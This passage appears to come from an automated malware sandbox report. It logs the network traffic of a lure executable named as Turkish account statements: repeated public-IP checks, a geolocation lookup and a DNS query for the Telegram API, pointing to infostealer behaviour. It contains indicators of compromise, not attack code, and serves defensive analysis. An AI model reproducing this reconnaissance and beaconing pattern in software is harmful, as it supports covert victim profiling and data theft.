Dec 10, 2024 14:07:59.633656025 CET	57486	53	192.168.2.5	1.1.1.1
Dec 10, 2024 14:07:59.772290945 CET	53	57486	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 14:07:30.682384014 CET	192.168.2.5	1.1.1.1	0x32ad	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:33.059812069 CET	192.168.2.5	1.1.1.1	0xde45	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:59.633656025 CET	192.168.2.5	1.1.1.1	0x5af7	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 14:07:30.822252035 CET	1.1.1.1	192.168.2.5	0x32ad	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 14:07:30.822252035 CET	1.1.1.1	192.168.2.5	0x32ad	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:30.822252035 CET	1.1.1.1	192.168.2.5	0x32ad	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:30.822252035 CET	1.1.1.1	192.168.2.5	0x32ad	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:30.822252035 CET	1.1.1.1	192.168.2.5	0x32ad	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:30.822252035 CET	1.1.1.1	192.168.2.5	0x32ad	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:33.200965881 CET	1.1.1.1	192.168.2.5	0xde45	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:33.200965881 CET	1.1.1.1	192.168.2.5	0xde45	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 10, 2024 14:07:59.772290945 CET	1.1.1.1	192.168.2.5	0x5af7	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49738	132.226.247.73	80	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:30.979773998 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:32.293127060 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 63621f07562182289529ef41accfd454 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 10, 2024 14:07:32.469508886 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:32.893028975 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9b0fad2d22712a98dfadbef0549eeca2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 10, 2024 14:07:35.329545021 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:35.757839918 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6c44a413fae4fa70a3180e7484f4956d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49756	132.226.247.73	80	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:36.513500929 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:37.816762924 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9b74ad57f8b0db0f39c9858cd01391c1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 10, 2024 14:07:37.820482969 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:38.243818045 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 21f7054ad608356ee4d4cdb5dc104e6a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
Dec 10, 2024 14:07:40.655339003 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:41.098958969 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cdddb0d22390ad7b78daa3cef429199f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49757	132.226.247.73	80	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:37.573723078 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:38.890465975 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 67240229bcd34ecb0fd366c662292585 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49771	132.226.247.73	80	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:40.684520960 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:41.993447065 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 40edc463619a23301b326dcb7f15a412 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49779	132.226.247.73	80	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:43.014000893 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:44.282963991 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b6f53aad0f8f28b0f279ad370eb0ebb8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49780	132.226.247.73	80	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:43.783762932 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:45.088120937 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4f9c2fea735fdb1d301766b56434a4c7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49788	132.226.247.73	80	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:46.159135103 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 10, 2024 14:07:47.462845087 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a38ab1009d03025d194b66db0c0ca960 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49796	132.226.247.73	80	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:47.095786095 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:48.399054050 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 86993ff2067a2ddb768f739c6f4fb13c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49804	132.226.247.73	80	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:49.246586084 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:50.549803019 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1620aa188ee103490562d6e4c645067c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49805	132.226.247.73	80	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:50.216514111 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:51.520323038 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: faf1f2ccbcb77f851bbe73d4fdf5f8cf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49813	132.226.247.73	80	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:52.333015919 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:53.680546999 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:53 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4249074cddd05a4bbe46a7f16fad05fc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49819	132.226.247.73	80	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:53.317639112 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:54.621526957 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5e9f44181c5b9a3884143ef6e8ffa19a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49827	132.226.247.73	80	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:55.474354982 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:56.777501106 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:56 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 02f4a7cc72c034c2a6096e2d327ff737 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49828	132.226.247.73	80	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:56.408404112 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:57.709773064 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 491db73714dc2cd845cbcc5c8998fc3c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49836	132.226.247.73	80	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:58.588660955 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:59.892184973 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 71b19b83166ae1ceaf32b85acf3351a1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49845	132.226.247.73	80	7644	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:08:01.942286015 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:08:03.285345078 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:08:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2fcb8aedc0c36c2dd229ef21e8c9f533 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49746	104.21.67.152	443	7200	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:34 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:35 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15377 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUX4BWR2884vpf4n4ZMDsVqIi3ZhMmXFqN%2Bw9F5n02WYjCGE5hn%2BU%2BEY4ezHdSUg9efW4nt9guL4kcZPWSDHtCAraPcdPn0kwKDMXcfQEY1XEVZ1WubihvBBTZhH9HT8xM27m6ga"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd756e3ce515c7-EWR alt-svc: h3=":443"; ma=86400 server-timing: 